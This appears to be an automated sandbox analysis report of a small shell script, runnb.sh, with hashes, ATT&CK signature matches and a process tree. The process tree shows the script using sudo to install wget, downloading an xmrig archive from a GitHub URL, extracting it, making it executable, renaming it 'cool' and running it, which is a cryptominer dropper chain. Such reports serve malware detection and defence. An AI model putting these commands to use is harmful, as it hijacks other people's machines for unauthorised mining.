Analysis
-
max time kernel
51s -
max time network
53s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
30/10/2024, 13:06
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 767 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 705 sudo -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 -
description ioc Process File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems sudo File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/fd sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/self/stat sudo File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd apt -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fileutl.message.ueS1Tj apt File opened for modification /tmp/fileutl.message.khLB3B apt File opened for modification /tmp/fileutl.message.SYpnjZ apt File opened for modification /tmp/fileutl.message.EjbMVs apt File opened for modification /tmp/fileutl.message.5kH4KV apt File opened for modification /tmp/fileutl.message.FM4QZg apt File opened for modification /tmp/fileutl.message.X6KWVX apt File opened for modification /tmp/fileutl.message.JAGxbL apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:704
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:705 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:718 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67WX-0000Ba-U94⤵
- Reads CPU attributes
PID:735
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:721 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67WX-0000Bd-Tl4⤵
- Reads CPU attributes
PID:734
-
-
-
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:724 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:731
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:742
-
-
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:763
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:764
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:765
-
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:766
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:767
-
-
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:768
-
-
/tmp/cool./cool2⤵PID:769
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
825B
MD52e64547594cb07a79be6167095b3421c
SHA1ab83381e1eb624ee06dbb5513cfc863fb2ec0099
SHA2567cda1aee71c8b2e2ce4133c99388f0e42abc7bd491fc92691db8375ab70933ae
SHA5125d9b98f3a027e785edf86ef07acab7978ac5e1cc48c412c2c73fd7a61836ed779ec7f57831a7f4d44d57ae0756cc11f0139f36fb769a0917210da0964b57e55e
-
Filesize
1KB
MD53306e338f0de9348470695cf0c09db1f
SHA112d9b6006acd4b506cfa50c89ecf0b84e2deb018
SHA256a8a474e7234e1a7c4f33c145018f2d235fe2a2a917eea63579cc018384364eac
SHA51299f07c204ed386392f5475be50302f644a0197cd65b504c94ede2c169f04d4187d4a5f163094648f14c987913457cf2918ec283b93811dbc19c39971db6e15c3
-
Filesize
128B
MD5fb161a8d77589e42343a69baac6558c3
SHA1da1d6196ad814ac6aceb4f8a5c74c42bb6bb77e0
SHA2564ae583fdd30f59a2ce5a6f622d86ca502aea6868045b2b5b46d7e03fa0f9da4d
SHA512dbe638525b7db65236d525169cfbdf96ff40db7dbf875419897807f141f1a23bdcb728d1a9bdaf914742722e5c7413b5ba61b5c1d5cac9baac1efe78db1c0a7a
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
146B
MD5941d420759e94a1bd868c37f625edb0e
SHA107a5df1665607adc1dca3eae8973194d84f33509
SHA2564cebde6c7e7da64d826a429a647e13d1cee779b1dd21a28ba6b4038399f5ab95
SHA512e79314a8786b2fe5f34036297e84c0ae7c042edc9566816f1ddce65ae9a173a8f90824df4e36fa9b3fd18d3dbe9577f13115cc7e5659594c777f378b5e4e23fe
-
Filesize
915B
MD548799cda21e70d63c321e8447aef7ec8
SHA1e4b5ff6d347bc0167a579ee45f3c60214583578f
SHA25679add92d542e684b6a9a5a1846af6e95ec7f1f4b43f0278fcaced2c7d29eb2dd
SHA51282bcb959b4cf2f0f331bcec83a2bb616553256775028e641a5cb5b74468ffb0a875816c0b62a01383ca4b71bb92f2a8697ebb3e2c95ea876499c7c0e92578fab
-
Filesize
288B
MD5e06795efeae2b189486bac86b73396f5
SHA17cedd0a0713397d1d097712f49dfe56ce0280a48
SHA256c6a38cfc3b0bcd0da3e28339e14c1020e95013cb9ec230580bac622e3efc1485
SHA512a601fe93788026af3440dbaab44747e3915fccf44956526cfd79f676553e6815f45dd697e7dac099a5008be9660f448415bb71afdf990aed6b6bba3adbbf98ab
-
Filesize
89B
MD52633f88076d9fc2543fa50f203e0d08f
SHA1ad6b4fd63cbc7c131c66639152d4f0a16e5f58b8
SHA256750d8a4120dbea512b80ba7b9b284d4c2b52009c2a52d1d106dab24f0bd1eac9
SHA512a12152884afdcdb8e2bcad89690f5e105683ce460876123c41a3c2bbb0d65d6e2ba19e394b262bd3bd3a7c7c74397f6c380ec577b49a02ce474cbb12a7f90ef6
-
Filesize
288B
MD5ea08c55f299f53254a3c5d4c3e80cacd
SHA14dd0cea75a44decb69821b37ae43ad3b31bf266b
SHA256d574187e37c7e4c775b3f08b1fc37fb678c54fd6af681f947808c9e474c7c1b9
SHA512d783a6ab3b30114c7a5c19ac4c8dc95abf482967d0b5f061121e24e9132bc7ab894f51b684664d1899a100814548c5f7ab7769b38d52affbebb8ca9c14dc94ee
-
Filesize
89B
MD58325c366e5037ddfc0286eda5fa5b2e2
SHA1542ca7ae5ed8e1b1d405b6362ce51ce2960fff3a
SHA25643cc8dd066396ff583c39678b6844c019ad2e2222dc0a6fcdf8415a7df08ffd3
SHA512e22a836ef72c3d7816ab190fda793c67d9f526ea008ad9ed627da70dbc5ea640b5447f5b174fa937d7583e10334eb7b4a3e3162d7f3d4bda1fd37fb4f3661718